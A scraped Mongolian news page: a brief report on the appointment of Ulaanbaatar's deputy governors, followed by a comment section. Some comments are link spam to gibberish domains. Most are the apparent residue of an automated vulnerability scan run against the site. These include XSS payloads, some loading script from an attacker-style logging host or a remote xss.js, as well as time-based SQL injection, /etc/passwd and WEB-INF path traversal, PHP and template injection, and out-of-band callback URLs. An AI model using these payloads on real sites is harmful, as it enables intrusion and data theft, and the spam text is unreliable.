Нийслэлийн Засаг даргын орлогч нарыг томиллоо

Aдмин / Хууль

Нийслэлийн ИТХ-ын Тэргүүлэгчдийн анхны хурал дөнгөж сая боллоо. Хурлаар Нийслэлийн Засаг даргын орлогчийг томилох тухай асуудлыг зөвшилцлөө. 2020-2024 онд Нийслэлийн Засаг дарга бөгөөд Улаанбаатар хотын Захирагч Д.Сумъяабазар зургаан орлогчтой ажиллах юм. Тодруулбал, Нийслэлийн Засаг даргын Хөгжлийн бодлого хариуцсан нэгдүгээр орлогчоор, Ж.Сандагсүрэн, Нийслэлийн Хүний хөгжил, нийгмийн бодлого хариуцсан төслүүдийн удирдагчаар Н.Баярчимэг, Нийслэлийн Инноваци, технологийн асуудал хариуцсан төслүүдийн удирдагчаар Д.Ихбааяр, Нийслэлийн Агаар орчны бохирдол хариуцсан төслүүдийн удирдагчаар З.Төмөртөмөө, Нийслэлийн Зам тээврийн асуудал хариуцсан төслүүдийн удирдагчаар Б.Одсүрэн, Нийслэлийн Барилга хот байгуулалт, хариуцсан төслүүдийн удирдагчаар Б.Сүхбаатар нарыг томилохоор Нийслэлийн ИТХ-ын Тэргүүлэгчдэд танилцууллаа.

Тэргүүлэгчдийн анхны хурал болсонтой холбогдуулан нийслэлийн ИТХ-ын дарга Ж.Батбаясгалан “Нийслэлчүүдийнхээ итгэлийг хүлээн сонгогдсон Тэргүүлэгчид цаашдаа хотын ажил амьдралтай холбоотой тогтоол шийдвэрүүдийг гаргахын тулд ойр ойрхон хуралдаж, шийдвэрүүдийг цаг алдалгүй гарган ажиллах болно. Мөн өнөөдөр томилогдож байгаа орлогч нар Хотын даргыг төлөөлж ажиллахдаа ямар нэгэн эрх ямба эдлэхгүй, иргэд, хот хоёрын хооронд гүүр болж ажиллах маш том үүрэг хүлээж байгаа” гэдгийг хэлээд, ажилд нь амжилт хүслээ.


Сэтгэгдэл

kgqtvckzhx [117.179.45.1] 2022-05-23 20:15:10

Мэдээ.МН [url=http://www.g2xavmf5g71d6s8lf8l104pe340349xgs.org/]ukgqtvckzhx[/url] kgqtvckzhx http://www.g2xavmf5g71d6s8lf8l104pe340349xgs.org/ <a href="http://www.g2xavmf5g71d6s8lf8l104pe340349xgs.org/">akgqtvckzhx</a>

jowrobhvdg [113.227.196.2] 2022-03-08 12:34:06

Мэдээ.МН <a href="http://www.g28d2us46cqxpm7jw2wc3g4l9m762158s.org/">ajowrobhvdg</a> [url=http://www.g28d2us46cqxpm7jw2wc3g4l9m762158s.org/]ujowrobhvdg[/url] jowrobhvdg http://www.g28d2us46cqxpm7jw2wc3g4l9m762158s.org/

sxpkflivlq [36.157.232.232] 2021-11-18 03:50:19

Мэдээ.МН <a href="http://www.g562yh3i207k86qg01kp854eqwcev3l7s.org/">asxpkflivlq</a> sxpkflivlq http://www.g562yh3i207k86qg01kp854eqwcev3l7s.org/ [url=http://www.g562yh3i207k86qg01kp854eqwcev3l7s.org/]usxpkflivlq[/url]

svlrhfr [124.228.212.19] 2021-08-04 01:51:25

Мэдээ.МН <a href="http://www.g5dvui1g7ityt8t3s83qh05i733367g6s.org/">asvlrhfr</a> [url=http://www.g5dvui1g7ityt8t3s83qh05i733367g6s.org/]usvlrhfr[/url] svlrhfr http://www.g5dvui1g7ityt8t3s83qh05i733367g6s.org/

jdjeonwf [139.212.194.228] 2021-06-04 07:15:23

Мэдээ.МН <a href="http://www.g61o1ji5n3s59s6qc44x0so2795sqsx8s.org/">ajdjeonwf</a> jdjeonwf http://www.g61o1ji5n3s59s6qc44x0so2795sqsx8s.org/ [url=http://www.g61o1ji5n3s59s6qc44x0so2795sqsx8s.org/]ujdjeonwf[/url]

nrndxmjsq [119.116.1.234] 2021-03-14 23:45:36

Мэдээ.МН [url=http://www.gco8b6l68i47a1b42043o2vqtc4wg4j1s.org/]unrndxmjsq[/url] <a href="http://www.gco8b6l68i47a1b42043o2vqtc4wg4j1s.org/">anrndxmjsq</a> nrndxmjsq http://www.gco8b6l68i47a1b42043o2vqtc4wg4j1s.org/

dschzsyebo [119.116.1.234] 2021-03-14 23:45:34

Мэдээ.МН <a href="http://www.gf3148tl82i8l8sri0256b8gpjrgx146s.org/">adschzsyebo</a> dschzsyebo http://www.gf3148tl82i8l8sri0256b8gpjrgx146s.org/ [url=http://www.gf3148tl82i8l8sri0256b8gpjrgx146s.org/]udschzsyebo[/url]

jpdqeqwpy [175.151.239.170] 2021-03-05 13:48:19

Мэдээ.МН [url=http://www.ghfl3vo6rq4e3z9y56b358p203m722gas.org/]ujpdqeqwpy[/url] jpdqeqwpy http://www.ghfl3vo6rq4e3z9y56b358p203m722gas.org/ <a href="http://www.ghfl3vo6rq4e3z9y56b358p203m722gas.org/">ajpdqeqwpy</a>

nwotmhyef [182.151.100.109] 2021-03-02 12:56:25

Мэдээ.МН <a href="http://www.g84w7j807p9712pcmw41pddzx503msu6s.org/">anwotmhyef</a> nwotmhyef http://www.g84w7j807p9712pcmw41pddzx503msu6s.org/ [url=http://www.g84w7j807p9712pcmw41pddzx503msu6s.org/]unwotmhyef[/url]

lhxjwcbdf [116.0.1.138] 2021-02-10 09:56:08

Мэдээ.МН <a href="http://www.gb3f9sp6cb95id62j639r74j0xf3ml14s.org/">alhxjwcbdf</a> [url=http://www.gb3f9sp6cb95id62j639r74j0xf3ml14s.org/]ulhxjwcbdf[/url] lhxjwcbdf http://www.gb3f9sp6cb95id62j639r74j0xf3ml14s.org/

nljtzdwn [121.231.9.178] 2021-02-08 10:29:06

Мэдээ.МН [url=http://www.gr29x6nd55gg446ysd5b66vqn005r86ms.org/]unljtzdwn[/url] nljtzdwn http://www.gr29x6nd55gg446ysd5b66vqn005r86ms.org/ <a href="http://www.gr29x6nd55gg446ysd5b66vqn005r86ms.org/">anljtzdwn</a>

ipwdfoyr [36.90.42.132] 2020-12-14 06:16:08

Мэдээ.МН [url=http://www.gp94kx02a61ewyxjn8ifq74b70u08803s.org/]uipwdfoyr[/url] <a href="http://www.gp94kx02a61ewyxjn8ifq74b70u08803s.org/">aipwdfoyr</a> ipwdfoyr http://www.gp94kx02a61ewyxjn8ifq74b70u08803s.org/

rjxzhqtfis [36.90.42.132] 2020-12-14 06:16:06

Мэдээ.МН rjxzhqtfis http://www.g5w8z1abtliz45r2m5z4u869qq702l88s.org/ <a href="http://www.g5w8z1abtliz45r2m5z4u869qq702l88s.org/">arjxzhqtfis</a> [url=http://www.g5w8z1abtliz45r2m5z4u869qq702l88s.org/]urjxzhqtfis[/url]

kmxytlgpg [113.108.127.10] 2020-12-14 05:34:29

Мэдээ.МН [url=http://www.g91365f6w52eu752inse9ducytv69h89s.org/]ukmxytlgpg[/url] <a href="http://www.g91365f6w52eu752inse9ducytv69h89s.org/">akmxytlgpg</a> kmxytlgpg http://www.g91365f6w52eu752inse9ducytv69h89s.org/

efwcjjyhlr [181.115.204.74] 2020-12-07 12:34:24

Мэдээ.МН [url=http://www.g9xa5pr4d4px7c51me9i6m511m3m736ns.org/]uefwcjjyhlr[/url] <a href="http://www.g9xa5pr4d4px7c51me9i6m511m3m736ns.org/">aefwcjjyhlr</a> efwcjjyhlr http://www.g9xa5pr4d4px7c51me9i6m511m3m736ns.org/

mfcipxpk [61.180.184.214] 2020-12-01 12:41:38

Мэдээ.МН mfcipxpk http://www.g9i6zd2cj1k71a27t2o2k20yc12ci88rs.org/ <a href="http://www.g9i6zd2cj1k71a27t2o2k20yc12ci88rs.org/">amfcipxpk</a> [url=http://www.g9i6zd2cj1k71a27t2o2k20yc12ci88rs.org/]umfcipxpk[/url]

sjyhdhzbmj [124.94.196.181] 2020-12-01 11:39:12

Мэдээ.МН <a href="http://www.g0w31etx9d6y0zb93xn54875gg07ae3es.org/">asjyhdhzbmj</a> [url=http://www.g0w31etx9d6y0zb93xn54875gg07ae3es.org/]usjyhdhzbmj[/url] sjyhdhzbmj http://www.g0w31etx9d6y0zb93xn54875gg07ae3es.org/

gsrcklyii [124.94.196.181] 2020-12-01 11:39:10

Мэдээ.МН gsrcklyii http://www.g845xz1rlap15se2d59q89b28i3ox3t6s.org/ <a href="http://www.g845xz1rlap15se2d59q89b28i3ox3t6s.org/">agsrcklyii</a> [url=http://www.g845xz1rlap15se2d59q89b28i3ox3t6s.org/]ugsrcklyii[/url]

vnsvlkjdjv [175.172.204.88] 2020-11-28 06:10:56

Мэдээ.МН vnsvlkjdjv http://www.g6567g03xjqo6mkpjsv785c1b07l8f07s.org/ [url=http://www.g6567g03xjqo6mkpjsv785c1b07l8f07s.org/]uvnsvlkjdjv[/url] <a href="http://www.g6567g03xjqo6mkpjsv785c1b07l8f07s.org/">avnsvlkjdjv</a>

csejbem [115.222.100.151] 2020-11-26 05:46:53

Мэдээ.МН <a href="http://www.g160gw6fg4643v1wp2ez7hq24kbvi429s.org/">acsejbem</a> [url=http://www.g160gw6fg4643v1wp2ez7hq24kbvi429s.org/]ucsejbem[/url] csejbem http://www.g160gw6fg4643v1wp2ez7hq24kbvi429s.org/

sygdprmrse [61.180.184.214] 2020-11-19 15:50:57

Мэдээ.МН sygdprmrse http://www.g706my06ggcm9a6i1m3e5t6126nm5a3zs.org/ <a href="http://www.g706my06ggcm9a6i1m3e5t6126nm5a3zs.org/">asygdprmrse</a> [url=http://www.g706my06ggcm9a6i1m3e5t6126nm5a3zs.org/]usygdprmrse[/url]

vzlvnwgsso [61.180.184.214] 2020-11-19 15:50:56

Мэдээ.МН <a href="http://www.g35pfl66jy654f30u1t63ih9eqe210phs.org/">avzlvnwgsso</a> vzlvnwgsso http://www.g35pfl66jy654f30u1t63ih9eqe210phs.org/ [url=http://www.g35pfl66jy654f30u1t63ih9eqe210phs.org/]uvzlvnwgsso[/url]

zlbtwndme [220.248.166.157] 2020-11-17 07:49:41

Мэдээ.МН <a href="http://www.gm6u2156nn5i93d2ek8x7ip78jd2e60xs.org/">azlbtwndme</a> zlbtwndme http://www.gm6u2156nn5i93d2ek8x7ip78jd2e60xs.org/ [url=http://www.gm6u2156nn5i93d2ek8x7ip78jd2e60xs.org/]uzlbtwndme[/url]

grdcrozmtd [220.248.166.157] 2020-11-17 07:49:38

Мэдээ.МН [url=http://www.gow58u4p0kp48gphvk5007l56857da8us.org/]ugrdcrozmtd[/url] <a href="http://www.gow58u4p0kp48gphvk5007l56857da8us.org/">agrdcrozmtd</a> grdcrozmtd http://www.gow58u4p0kp48gphvk5007l56857da8us.org/

colinij [182.200.85.205] 2020-11-05 00:30:01

Мэдээ.МН <a href="http://www.gwwp5c8hh3c4c21oz058h420um9m6o86s.org/">acolinij</a> colinij http://www.gwwp5c8hh3c4c21oz058h420um9m6o86s.org/ [url=http://www.gwwp5c8hh3c4c21oz058h420um9m6o86s.org/]ucolinij[/url]

e [116.113.93.82] 2020-10-28 22:01:12

1

e [116.113.93.82] 2020-10-28 22:01:08

1<CwwdYV<

e [116.113.93.82] 2020-10-28 22:01:05

1<img sRc='http://attacker-9332/log.php?

e [116.113.93.82] 2020-10-28 22:01:03

1<SkwXuQ x=9213>

e [116.113.93.82] 2020-10-28 22:01:00

1<ifRAme sRc=9766.com></IfRamE>

e [116.113.93.82] 2020-10-28 22:00:57

1<WD5KOV>IYKSZ[!+!]</WD5KOV>

e [116.113.93.82] 2020-10-28 22:00:54

1zV6PE <ScRiPt >GDpz(9626)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:00:52

1<% contenteditable onresize=GDpz(9368)>

e [116.113.93.82] 2020-10-28 22:00:49

1}body{acu:Expre/**/SSion(GDpz(9666))}

e [116.113.93.82] 2020-10-28 22:00:46

1<img<!-- --> src=x onerror=alert(9417);//><!-- -->

e [116.113.93.82] 2020-10-28 22:00:43

[url=http://www.vulnweb.com][/url]

e [116.113.93.82] 2020-10-28 22:00:40

<a HrEF=jaVaScRiPT:>

e [116.113.93.82] 2020-10-28 22:00:37

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82] 2020-10-28 22:00:34

1<input autofocus onfocus=GDpz(9862)>

e [116.113.93.82] 2020-10-28 22:00:31

e [116.113.93.82] 2020-10-28 22:00:28

1<ScRiPt>GDpz(9648)</sCripT>

e [116.113.93.82] 2020-10-28 22:00:25

1\u003CScRiPt\GDpz(9706)\u003C/sCripT\u003E

e [116.113.93.82] 2020-10-28 22:00:22

%31%3C%53%63%52%69%50%74%20%3E%47%44%70%7A%289965%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82] 2020-10-28 22:00:19

1<img/src=">" onerror=alert(9029)>

e [116.113.93.82] 2020-10-28 22:00:16

1<img src=xyz OnErRor=GDpz(9580)>

e [116.113.93.82] 2020-10-28 22:00:14

1<img src=//testasp.vulnweb.com/t/dot.gif onload=GDpz(9194)>

e [116.113.93.82] 2020-10-28 22:00:10

1<body onload=GDpz(9183)>

e [116.113.93.82] 2020-10-28 22:00:07

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9324'>

e [116.113.93.82] 2020-10-28 22:00:04

1<isindex type=image src=1 onerror=GDpz(9932)>

e [116.113.93.82] 2020-10-28 22:00:02

1<svg

e [116.113.93.82] 2020-10-28 21:59:58

1<video><source onerror="javascript:GDpz(9598)">

e [116.113.93.82] 2020-10-28 21:59:55

1<ScRiPt >GDpz(9606)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:59:53

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9255></ScRiPt>

e [116.113.93.82] 2020-10-28 21:59:49

1<ScRiPt >GDpz(9210)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:59:46

1<ScR<ScRiPt>IpT>GDpz(9729)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 21:59:43

1<script>GDpz(9801)</script>

e [116.113.93.82] 2020-10-28 21:59:40

1<WXX7QN>SJQP3[!+!]</WXX7QN>

e [116.113.93.82] 2020-10-28 21:59:37

1<ScRiPt >GDpz(9713)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:59:34

{{10000174*10000018}}

e [116.113.93.82] 2020-10-28 21:59:32

acux9614

e [116.113.93.82] 2020-10-28 21:59:28

acu10548<s1﹥s2ʺs3ʹuca10548

e [116.113.93.82] 2020-10-28 21:59:25

19944426

e [116.113.93.82] 2020-10-28 21:59:22

'"()&%<acx><ScRiPt >GDpz(9450)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:59:19

1'"()&%<acx><ScRiPt >GDpz(9319)</ScRiPt>

e [116.113.93.82<LfSKE6<] 2020-10-28 21:59:13

1

e [116.113.93.82<img sRc='http://attacker-9201/log.php?] 2020-10-28 21:59:10

1

e [116.113.93.82<60zdAb x=9522>] 2020-10-28 21:59:07

1

e [116.113.93.82<ifRAme sRc=9593.com></IfRamE>] 2020-10-28 21:59:04

1

e [116.113.93.82<W1GJ3F>DXQWW[!+!]</W1GJ3F>] 2020-10-28 21:59:01

1

e [116.113.93.82rbXge <ScRiPt >GDpz(9097)</ScRiPt>] 2020-10-28 21:58:58

1

e [116.113.93.82<% contenteditable onresize=GDpz(9404)>] 2020-10-28 21:58:55

1

e [116.113.93.82}body{acu:Expre/**/SSion(GDpz(9685))}] 2020-10-28 21:58:52

1

e [116.113.93.82<img<!-- --> src=x onerror=alert(9155);//><!-- -->] 2020-10-28 21:58:49

1

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 21:58:46

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 21:58:44

1

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 21:58:41

1

e [116.113.93.82<input autofocus onfocus=GDpz(9980)>] 2020-10-28 21:58:38

1

e [] 2020-10-28 21:58:35

1

e [116.113.93.82<ScRiPt>GDpz(9903)</sCripT>] 2020-10-28 21:58:33

1

e [116.113.93.82\u003CScRiPt\GDpz(9640)\u003C/sCripT\u003E] 2020-10-28 21:58:30

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%47%44%70%7A%289217%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 21:58:27

1

e [116.113.93.82<img/src=">" onerror=alert(9752)>] 2020-10-28 21:58:24

1

e [116.113.93.82<img src=xyz OnErRor=GDpz(9985)>] 2020-10-28 21:58:21

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=GDpz(9015)>] 2020-10-28 21:58:18

1

e [116.113.93.82<body onload=GDpz(9428)>] 2020-10-28 21:58:15

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9413'>] 2020-10-28 21:58:13

1

e [116.113.93.82<isindex type=image src=1 onerror=GDpz(9332)>] 2020-10-28 21:58:09

1

e [116.113.93.82<svg ] 2020-10-28 21:58:06

1

e [116.113.93.82<video><source onerror="javascript:GDpz(9696)">] 2020-10-28 21:58:04

1

e [116.113.93.82] 2020-10-28 21:58:03

WEB-INF\web.xml

e [116.113.93.82] 2020-10-28 21:58:02

WEB-INF/web.xml

e [116.113.93.82<ScRiPt >GDpz(9438)</ScRiPt>] 2020-10-28 21:58:01

1

e [116.113.93.82] 2020-10-28 21:58:00

/WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 21:57:59

1

e [116.113.93.82] 2020-10-28 21:57:59

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 21:57:58

file:///etc/passwd

e [116.113.93.82] 2020-10-28 21:57:58

1

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9687></ScRiPt>] 2020-10-28 21:57:57

1

e [116.113.93.82] 2020-10-28 21:57:57

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 21:57:57

qNX07jNh'));select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:57:56

..

e [116.113.93.82] 2020-10-28 21:57:55

mBQs0epe');select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:57:55

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82] 2020-10-28 21:57:54

hZ9L3evO';select pg_sleep(3); --

e [116.113.93.82<ScRiPt >GDpz(9030)</ScRiPt>] 2020-10-28 21:57:54

1

e [116.113.93.82] 2020-10-28 21:57:54

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82] 2020-10-28 21:57:54

-1));select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 21:57:53

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82] 2020-10-28 21:57:53

-1);select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 21:57:52

-1;select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 21:57:52

%2fetc%2fpasswd

e [116.113.93.82<ScR<ScRiPt>IpT>GDpz(9374)</sCr<ScRiPt>IpT>] 2020-10-28 21:57:52

1

e [116.113.93.82] 2020-10-28 21:57:51

/etc/passwd

e [116.113.93.82] 2020-10-28 21:57:51

ZuG4ok0H'; waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 21:57:49

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82] 2020-10-28 21:57:49

1 waitfor delay '0:0:6' --

e [116.113.93.82<script>GDpz(9957)</script>] 2020-10-28 21:57:49

1

e [116.113.93.82] 2020-10-28 21:57:48

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:57:48

-1); waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 21:57:47

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82] 2020-10-28 21:57:47

-1; waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 21:57:46

../../../../../../../../../../etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:57:46

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

e [116.113.93.82<WN31UI>UFPGZ[!+!]</WN31UI>] 2020-10-28 21:57:45

1

e [116.113.93.82] 2020-10-28 21:57:45

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82] 2020-10-28 21:57:45

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z

e [116.113.93.82] 2020-10-28 21:57:44

../../../../../../../../../../../../../../../proc/version

e [116.113.93.82] 2020-10-28 21:57:44

0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z

e [116.113.93.82] 2020-10-28 21:57:43

../../../../../../../../../../etc/passwd

e [116.113.93.82] 2020-10-28 21:57:43

if(now()=sysdate(),sleep(9),0)

e [116.113.93.82<ScRiPt >GDpz(9340)</ScRiPt>] 2020-10-28 21:57:43

1

e [116.113.93.82] 2020-10-28 21:57:42

-1" OR 2+567-567-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:57:42

e [116.113.93.82] 2020-10-28 21:57:41

-1' OR 2+619-619-1=0+0+0+1 or '8DvvwAMv'='

e [116.113.93.82] 2020-10-28 21:57:41

e [{{10000368*9999370}}] 2020-10-28 21:57:40

1

e [116.113.93.82] 2020-10-28 21:57:40

-1' OR 2+473-473-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:57:40

JyI=

e [116.113.93.82] 2020-10-28 21:57:38

-1 OR 2+941-941-1=0+0+0+1

e [116.113.93.82] 2020-10-28 21:57:38

@@Iv8Xu

e [acux2078] 2020-10-28 21:57:37

1

e [116.113.93.82] 2020-10-28 21:57:37

1

e [116.113.93.82] 2020-10-28 21:57:37

-1 OR 2+535-535-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:57:36

t2odzHLk

e [116.113.93.82] 2020-10-28 21:57:36

\

e [116.113.93.82] 2020-10-28 21:57:35

1

e [116.113.93.82] 2020-10-28 21:57:35

1'"

e [acu9106<s1﹥s2ʺs3ʹuca9106] 2020-10-28 21:57:34

1

e [116.113.93.82] 2020-10-28 21:57:34

1

e [116.113.93.829096046] 2020-10-28 21:57:32

1

e [116.113.93.82] 2020-10-28 21:57:30

<!--

e [116.113.93.82] 2020-10-28 21:57:29

${@print(md5(acunetix_wvs_security_test))}\

e ['"()&%<acx><ScRiPt >GDpz(9184)</ScRiPt>] 2020-10-28 21:57:29

1

e [116.113.93.82] 2020-10-28 21:57:29

'"

e [116.113.93.82] 2020-10-28 21:57:28

${@print(md5(acunetix_wvs_security_test))}

e [116.113.93.82] 2020-10-28 21:57:27

";print(md5(acunetix_wvs_security_test));$a="

e [116.113.93.82] 2020-10-28 21:57:27

create/.

e [116.113.93.82'"()&%<acx><ScRiPt >GDpz(9971)</ScRiPt>] 2020-10-28 21:57:26

1

e [] 2020-10-28 21:57:26

1

e [116.113.93.82] 2020-10-28 21:57:26

';print(md5(acunetix_wvs_security_test));$a='

e [116.113.93.82] 2020-10-28 21:57:26

/www.vulnweb.com

e [116.113.93.82] 2020-10-28 21:57:26

create

e [<!--] 2020-10-28 21:57:25

1

e [116.113.93.82] 2020-10-28 21:57:25

;print(md5(acunetix_wvs_security_test));

e [] 2020-10-28 21:57:25

1

e [116.113.93.82] 2020-10-28 21:57:25

create

e ['"] 2020-10-28 21:57:24

1

e [116.113.93.82] 2020-10-28 21:57:24

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [JyI=] 2020-10-28 21:57:24

1

e [/www.vulnweb.com] 2020-10-28 21:57:24

1

e [116.113.93.82] 2020-10-28 21:57:24

testasp.vulnweb.com/t/xss.html?%00

e [@@JfESR] 2020-10-28 21:57:23

1

e [116.113.93.82] 2020-10-28 21:57:23

testasp.vulnweb.com

e [116.113.93.82] 2020-10-28 21:57:23

HttP://testasp.vulnweb.com/t/xss.html?%00

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 21:57:22

1

e [1] 2020-10-28 21:57:22

1

e [116.113.93.82] 2020-10-28 21:57:22

http://hitd8hfolo32M.bxss.me/

e [116.113.93.82] 2020-10-28 21:57:22

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [WEB-INF\web.xml] 2020-10-28 21:57:22

1

e [116.113.93.82] 2020-10-28 21:57:21

Http://testasp.vulnweb.com/t/fit.txt

e [\] 2020-10-28 21:57:21

1

e [WEB-INF/web.xml] 2020-10-28 21:57:21

1

e [create/.] 2020-10-28 21:57:21

1

e [116.113.93.82] 2020-10-28 21:57:20

1some_inexistent_file_with_long_name.jpg

e [1'"] 2020-10-28 21:57:20

1

e [/WEB-INF/web.xml] 2020-10-28 21:57:20

1

e [116.113.93.82] 2020-10-28 21:57:20

^(#$!@#$)(()))******

e [create] 2020-10-28 21:57:20

1

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:57:19

1

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 21:57:19

1

e [116.113.93.82] 2020-10-28 21:57:19

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [http://hit6krMQAQ28P.bxss.me/] 2020-10-28 21:57:19

1

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 21:57:19

1

e [116.113.93.82] 2020-10-28 21:57:18

!(()&&!|*|*|

e [create] 2020-10-28 21:57:18

1

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:57:18

1

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 21:57:18

1

e [file:///etc/passwd] 2020-10-28 21:57:17

1

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 21:57:17

1

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 21:57:16

1

e [116.113.93.82] 2020-10-28 21:57:16

)

e [116.113.93.82] 2020-10-28 21:57:16

'"()

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 21:57:15

1

e [..] 2020-10-28 21:57:15

1

e [116.113.93.82] 2020-10-28 21:57:15

1

e [116.113.93.82] 2020-10-28 21:57:15

Array

e [116.113.93.82] 2020-10-28 21:57:14

Array

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 21:57:14

1

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 21:57:14

1

e [116.113.93.82] 2020-10-28 21:57:14

1

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 21:57:14

1

e [116.113.93.82] 2020-10-28 21:57:14

Array

e [116.113.93.82] 2020-10-28 21:57:14

1

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 21:57:13

1

e [116.113.93.82] 2020-10-28 21:57:13

12345'"\'\");|]*{ <>

e [testasp.vulnweb.com] 2020-10-28 21:57:13

1

e [116.113.93.82] 2020-10-28 21:57:13

1&n950017=v939827

e [zDUiY6FC'));select pg_sleep(3); -- ] 2020-10-28 21:57:13

1

e [^(#$!@#$)(()))******] 2020-10-28 21:57:12

1

e [%2fetc%2fpasswd] 2020-10-28 21:57:12

1

e ['"()] 2020-10-28 21:57:12

1

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 21:57:12

1

e [116.113.93.82] 2020-10-28 21:57:12

e [Ea4Xg8hV');select pg_sleep(9); -- ] 2020-10-28 21:57:11

1

e [Array] 2020-10-28 21:57:11

1

e [/etc/passwd] 2020-10-28 21:57:11

1

e [!(()&&!|*|*|] 2020-10-28 21:57:11

1

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 21:57:11

1

e [n9QLWcTX';select pg_sleep(9); -- ] 2020-10-28 21:57:10

